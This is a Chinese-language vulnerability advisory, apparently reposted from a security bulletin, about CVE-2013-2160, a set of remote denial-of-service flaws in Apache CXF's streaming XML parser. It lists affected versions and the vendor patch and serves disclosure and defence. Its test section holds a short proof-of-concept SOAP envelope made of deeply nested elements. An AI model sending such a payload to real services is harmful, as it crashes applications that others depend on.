Apache CXF多个远程拒绝服务漏洞(CVE

发布日期:2013-07-09
更新日期:2013-07-11

受影响系统:
Apache Group CXF <= 2.5.10
Apache Group CXF 2.7.4
Apache Group CXF 2.6.7
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61030
CVE(CAN) ID: CVE-2013-2160

Apache CXF是一个开源服务框架,用于使用JAX-WS、JAX-RS等前端编程API编译和开发服务。

Apache CXF 2.5.10, 2.6.7, 2.7.4存在多个远程拒绝服务漏洞,流XML解析器没有限制元素数、属性数、接收文档嵌套结构等,攻击者利用这些漏洞可造成应用崩溃,导致拒绝服务。

<*来源:Andreas Falkenberg
        Juraj Somorovsky
 
  链接:?version=1&modificationDate=1372
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?xml version='1.0'?>
<soap:Envelope xmlns:soap='http://www.example.com/2003/05/soap-envelope';>
<soap:Body>
<element>
<element>
<element>
<element>
[thousands more]
</element>
</element>
</element>
</element>
</soap:Body>
</soap:Envelope>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Apache Group
------------
Apache Group已经为此发布了一个安全公告(CVE-2013-2160)以及相应补丁:
CVE-2013-2160:Denial of Service Attacks on Apache CXF
链接:?version=1&modificationDate=1372

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pxggf.html